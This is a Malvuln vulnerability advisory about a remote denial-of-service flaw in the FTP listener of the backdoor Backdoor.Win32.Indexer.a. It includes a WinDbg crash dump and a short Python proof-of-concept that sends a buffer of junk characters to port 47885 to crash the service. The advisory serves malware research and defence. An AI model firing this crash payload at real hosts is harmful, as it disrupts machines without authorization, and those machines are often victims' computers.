Authored by malvuln | Site malvuln.com

Backdoor.Win32.Indexer.a malware suffers from a denial of service vulnerability.

Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/2b576e7551afe1c7575dc680396f1b5b_B.txt
Contact: [email protected]
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Indexer.a
Vulnerability: Remote Denial Of Service
Description: Indexer.a runs an FTP server that listens on TCP port 47885, sending an unexpected payload of junk chars causes an exception resulting in a crash an denial of service.
Type: PE32
MD5: 2b576e7551afe1c7575dc680396f1b5b
Vuln ID: MVID-2021-0092
Dropped files:
Disclosure: 02/16/2021

Memory Dump:
(1618.14b0): Unknown exception - code 0eedfade (first/second chance not available)
eax=00000000 ebx=00000000 ecx=00000007 edx=00000000 esi=00000003 edi=00000003
eip=7710ed3c esp=0019f460 ebp=0019f5f0 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216
ntdll!ZwWaitForMultipleObjects+0xc:
7710ed3c c21400 ret 14h

0:000> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************


FAULTING_IP:
KERNELBASE!RaiseException+62
75eb08f2 8b4c2454 mov ecx,dword ptr [esp+54h]

EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 75eb08f2 (KERNELBASE!RaiseException+0x00000062)
ExceptionCode: 0eedfade
ExceptionFlags: 00000001
NumberParameters: 7
Parameter[0]: 004129ae
Parameter[1]: 04105d4c
Parameter[2]: 04105dc8
Parameter[3]: 00000000
Parameter[4]: 00000000
Parameter[5]: 0019fe9c
Parameter[6]: 0019fddc

DEFAULT_BUCKET_ID: DELPHI_EXCEPTION

PROCESS_NAME: Backdoor.Win32.Indexer.a.2b576e7551afe1c7575dc680396f1b5b.exe

ERROR_CODE: (NTSTATUS) 0xeedfade - <Unable to get error code text>

EXCEPTION_CODE: (Win32) 0xeedfade (250477278) - <Unable to get error code text>

EXCEPTION_PARAMETER1: 004129ae

EXCEPTION_PARAMETER2: 04105d4c

EXCEPTION_PARAMETER3: 04105dc8

EXCEPTION_PARAMETER4: 0

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG: 0

APPLICATION_VERIFIER_FLAGS: 0

FAULTING_THREAD: 000014b0

PRIMARY_PROBLEM_CLASS: DELPHI_EXCEPTION

BUGCHECK_STR: APPLICATION_FAULT_DELPHI_EXCEPTION

LAST_CONTROL_TRANSFER: from 00443345 to 75eb08f2

STACK_TEXT:
0019fdf0 00443345 041050ac 041050ac 0044317f KERNELBASE!RaiseException+0x62
WARNING: Stack unwind information not available. Following frames may be wrong.
0019fe14 0040c70b 0040ba01 04102c70 00443345 Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!Ftpsrvcinitialization$qqrv+0x30009
0019fe20 00443345 04102c70 04102c70 0044317f Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!FtpsrvTFtpServer$bdtr$qqrv+0x47
0019fe2c 0044317f 00000000 0019fe9c 00000000 Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!Ftpsrvcinitialization$qqrv+0x30009
0019fe44 004311ea 04102200 00000001 0044c7a9 Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!Ftpsrvcinitialization$qqrv+0x2fe43
0019fe50 0044c7a9 0041c253 04102c70 04102c70 Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!Ftpsrvcinitialization$qqrv+0x1deae
0019fe54 0041c253 04102c70 04102c70 04102c70 Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!Ftpsrvcinitialization$qqrv+0x3946d
0044c7a9 52ff108b 84c358e4 c3017fd2 108b5250 Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!Ftpsrvcinitialization$qqrv+0x8f17
0044c7ad 84c358e4 c3017fd2 108b5250 5ae852ff 0x52ff108b
0044c7b1 c3017fd2 108b5250 5ae852ff 8090c358 0x84c358e4
0044c7b5 108b5250 5ae852ff 8090c358 45a9b03d 0xc3017fd2
0044c7b9 5ae852ff 8090c358 45a9b03d 10760100 0x108b5250
0044c7bd 8090c358 45a9b03d 10760100 006a006a 0x5ae852ff
0044c7c1 45a9b03d 10760100 006a006a df68006a 0x8090c358
0044c7c5 10760100 006a006a df68006a e80eedfa 0x45a9b03d
0044c7c9 006a006a df68006a e80eedfa 0000bb7f 0x10760100
0044c7cd df68006a e80eedfa 0000bb7f 809090c3 0x6a006a
0044c7d1 e80eedfa 0000bb7f 809090c3 45a9b03d 0xdf68006a
0044c7d5 00000000 809090c3 45a9b03d 16740000 0xe80eedfa


FOLLOWUP_IP:
Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!Ftpsrvcinitialization$qqrv+30009
00443345 8b7310 mov esi,dword ptr [ebx+10h]

SYMBOL_STACK_INDEX: 1

SYMBOL_NAME: backdoor_win32_indexer_a!Ftpsrvcinitialization$qqrv+30009

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b

IMAGE_NAME: Backdoor.Win32.Indexer.a.2b576e7551afe1c7575dc680396f1b5b.exe

DEBUG_FLR_IMAGE_TIMESTAMP: 3814be7c

STACK_COMMAND: dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; ~0s; .ecxr ; kb

BUCKET_ID: APPLICATION_FAULT_DELPHI_EXCEPTION_backdoor_win32_indexer_a!Ftpsrvcinitialization$qqrv+30009

FAILURE_BUCKET_ID: DELPHI_EXCEPTION_eedfade_Backdoor.Win32.Indexer.a.2b576e7551afe1c7575dc680396f1b5b.exe!Ftpsrvcinitialization$qqrv


Exploit/PoC:
from socket import *

MALWARE_HOST="x.x.x.x"
PORT=47885

def doit():
s=socket(AF_INET, SOCK_STREAM)
s.connect((MALWARE_HOST, PORT))

PBARBAR="A"*256
s.send(PBARBAR)

print("Backdoor.Win32.Indexer.a / Remote Dos")
print("MD5: 2b576e7551afe1c7575dc680396f1b5b")
print("By Malvuln");

if __name__=="__main__":
doit()



Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).